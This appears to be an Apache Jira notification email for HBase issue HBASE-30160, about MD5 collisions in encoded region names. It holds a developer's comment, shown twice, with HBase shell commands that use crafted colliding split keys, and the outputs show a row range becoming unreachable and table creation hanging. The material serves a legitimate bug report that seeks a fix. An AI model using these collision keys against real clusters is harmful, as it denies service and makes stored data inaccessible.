[jira] [Comment Edited] (HBASE-30160) Prevent region creation if the encoded region names are the same

Balazs Meszaros (Jira) Wed, 13 May 2026 06:05:46 -0700


    [ 
https://issues.apache.org/jira/browse/HBASE-30160?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=18080609#comment-18080609
 ]


Balazs Meszaros edited comment on HBASE-30160 at 5/13/26 1:03 PM:
------------------------------------------------------------------

I was able to exploit splitting, too:
{noformat}
create 'table1', 'f'
put 'table1', 'a', 'f', 123
put 'table1', 'z', 'f', 456

# split near 'm'
# it is important to split at the alphabetically second split-point 
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,115,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,191,153,109,68,64,204,231,44,114,222,191,210,195,217,184,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,178,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,193,104,134,161,17,252,189,152,121,37,167,113,223,160,193,70,2,4,136].pack('c*')

# the second split-point
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

ERROR: org.apache.hadoop.hbase.DoNotRetryIOException: 
54cbfe763235477aebe5a443bbd95cc6 NOT splittable

# it failed for some reason, but the next try later succeeded
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

# scan
scan 'table1'
ROW  COLUMN+CELL
 a column=f:, timestamp=2026-05-13T14:40:06.557, value=123
 z column=f:, timestamp=2026-05-13T14:40:12.133, value=456

ERROR: No location found for 'table1', 
row='m\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF60\x94\x0A\x84\x96o\x1F\xFFk\x0B\xCEQ\xDF\xF5srZ\x8A\xF3\xF0\x93\xFBC!\x029\xBE\xC960\xDA^\xE3\xD0\xE3\xDC\xA4+N\x87\xBE\xF0C\xE4?\x99mD@\xCC\xE7,r\xDE\xBF\xD2\xC3\xD98g\xDB\xDB\x1Ab7\xE97\x88\xA6
 \xE8\x0D\xF7~\xE6%\xAD\xA5+N\x8192\x18\xF5 
\x15\xE1\x17\x15\xC1X"}\x1E\xC7S\xDE\xF9e;S\xB6\xC9S\xA1\xCFcAi\x86\xA1\x11\xFC\xBD\x98y%\xA7q\xDF\xA0AF\x02\x04\x88',
 locateType=CURRENT

For usage try 'help "scan"'

Took 8.2603 seconds
{noformat}
I don't know whether I can take a region offline and make some keys inaccessible 
with this approach.


was (Author: balazs.meszaros):
I was able to exploit splitting, too:
{noformat}
create 'table1', 'f'
put 'table1', 'a', 'f', 123
put 'table1', 'z', 'f', 456

# split near 'm'
# it is important to add the alphabetically first split-point 
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,115,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,191,153,109,68,64,204,231,44,114,222,191,210,195,217,184,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,178,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,193,104,134,161,17,252,189,152,121,37,167,113,223,160,193,70,2,4,136].pack('c*')

# the second split-point
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

ERROR: org.apache.hadoop.hbase.DoNotRetryIOException: 
54cbfe763235477aebe5a443bbd95cc6 NOT splittable

# it failed for some reason, but the next try later succeeded
split 'table1', 
[109,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,246,48,148,10,132,150,111,31,255,107,11,206,81,223,245,115,114,90,138,243,240,147,251,67,33,2,57,190,201,54,48,218,94,227,208,227,220,164,43,78,135,190,240,67,228,63,153,109,68,64,204,231,44,114,222,191,210,195,217,56,103,219,219,26,98,55,233,55,136,166,32,232,13,247,126,230,37,173,165,43,78,129,57,50,24,245,32,21,225,23,21,193,88,34,125,30,199,83,222,249,101,59,83,182,201,83,161,207,99,65,105,134,161,17,252,189,152,121,37,167,113,223,160,65,70,2,4,136].pack('c*')

# scan
scan 'table1'
ROW  COLUMN+CELL
 a column=f:, timestamp=2026-05-13T14:40:06.557, value=123
 z column=f:, timestamp=2026-05-13T14:40:12.133, value=456

ERROR: No location found for 'table1', 
row='m\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF60\x94\x0A\x84\x96o\x1F\xFFk\x0B\xCEQ\xDF\xF5srZ\x8A\xF3\xF0\x93\xFBC!\x029\xBE\xC960\xDA^\xE3\xD0\xE3\xDC\xA4+N\x87\xBE\xF0C\xE4?\x99mD@\xCC\xE7,r\xDE\xBF\xD2\xC3\xD98g\xDB\xDB\x1Ab7\xE97\x88\xA6
 \xE8\x0D\xF7~\xE6%\xAD\xA5+N\x8192\x18\xF5 
\x15\xE1\x17\x15\xC1X"}\x1E\xC7S\xDE\xF9e;S\xB6\xC9S\xA1\xCFcAi\x86\xA1\x11\xFC\xBD\x98y%\xA7q\xDF\xA0AF\x02\x04\x88',
 locateType=CURRENT

For usage try 'help "scan"'

Took 8.2603 seconds
{noformat}
I don't know if I can offline a region and make some keys inaccessible with 
this approach.

> Prevent region creation if the encoded region names are the same
> ----------------------------------------------------------------
>
>                 Key: HBASE-30160
>                 URL: https://issues.apache.org/jira/browse/HBASE-30160
>             Project: HBase
>          Issue Type: Sub-task
>            Reporter: Balazs Meszaros
>            Priority: Major
>
> HBase region names are hashed like this: MD5(tableName,startKey,...). With a 
> special startKey we can create collisions easily, like this:
> {noformat}
> hbase:001:0> create 'table1', 'f', SPLITS => 
> ["\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00^B\xb9\x99\xdb\xb7\x98W\xfa\xa1\xe0\xf1\xbc\x09h]1S[&u*\x93\xa1&RzF\x87\x9e\x970\x84\xe5\xb9\xe3ln*l\x07\x0c\xef\x03\x96Q\xbdC!\xb1\xdec-\xfb+\x11\x83h\xc1\xbe$\x1f\xae\x95\xaf\xd3W\x07\x8a\x01\xfa\xf1\xba\x83\x8c}\xa5A1\x83\xae\xae\xf8\xe6\xf9\xe5F\xa7\xc9\x1a\xfeM\xec\x07\xdem\x0em\x9e\x97\xf4\x16\x08\x94\xa8\x8a87\x07\xb5v\xac\xe7\x07\x10\x22\xfc\xb9\x1fm\xbd\x13V\xa9\xedX\xf0\xb1",
>  
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00^B\xb9\x99\xdb\xb7\x98W\xfa\xa1\xe0\xf1\xbc\x09h]1S[\xa6u*\x93\xa1&RzF\x87\x9e\x970\x84\xe5\xb9\xe3ln*l\x07\x0c\xef\x03\x96\xd1\xbcC!\xb1\xdec-\xfb+\x11\x83h\xc1>$\x1f\xae\x95\xaf\xd3W\x07\x8a\x01\xfa\xf1\xba\x83\x8c}\xa5A1\x83\xae\xae\xf8f\xf9\xe5F\xa7\xc9\x1a\xfeM\xec\x07\xdem\x0em\x9e\x97\xf4\x16\x08\x94\xa8\x8a87\x075w\xac\xe7\x07\x10\x22\xfc\xb9\x1fm\xbd\x13V)\xedX\xf0\xb1"]
> ERROR: The procedure 9 is still running
> For usage try 'help "create"'
> Took 608.8101 seconds
> {noformat}
> The table creation fails, because hashes are the same:
> {noformat}
> 2026-05-13 09:34:23,762 INFO  org.apache.hadoop.hbase.regionserver.HRegion: 
> [RegionOpenAndInit-table1-pool-2]: creating {ENCODED => 
> 647314dfe2b7e604e08fd7fd3fec44fc, NAME => 'table1,...
> 2026-05-13 09:34:23,764 INFO  org.apache.hadoop.hbase.regionserver.HRegion: 
> [RegionOpenAndInit-table1-pool-1]: creating {ENCODED => 
> 647314dfe2b7e604e08fd7fd3fec44fc, NAME => 'table1,...
> 2026-05-13 09:34:23,772 WARN  org.apache.hadoop.hdfs.DataStreamer: 
> [Thread-140]: DataStreamer Exception
> java.io.FileNotFoundException: File does not exist: 
> /hbase/data/default/table1/647314dfe2b7e604e08fd7fd3fec44fc/.regioninfo 
> (inode 16653) [Lease.  Holder: DFSClient_NONMAPREDUCE_1353520776_1, pending 
> creates: 3]
>         at 
> org.apache.hadoop.hdfs.server.namenode.FSNamesystem.checkLease(FSNamesystem.java:3194)
>         at 
> org.apache.hadoop.hdfs.server.namenode.FSDirWriteFileOp.analyzeFileState(FSDirWriteFileOp.java:609)
> ...
> {noformat}
> The procedure never finishes and prohibits further creation of {{table1}}.
> This issue should be triggerable by splitting the table twice:
> {noformat}
> split 'table1', 'malicious-key1'
> split 'table1', 'malicious-key2'
> {noformat}
> It would be hard to change MD5 to something else, but we should handle these 
> collisions better. We should check whether the region hashes are the same and 
> fail immediately. Under normal circumstances, the chance of a collision with 
> automatic splitting is very, very low.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)

[jira] [Comment Edited] (HBASE-30160) Prevent region creation if the encoded region names are the same

Reply via email to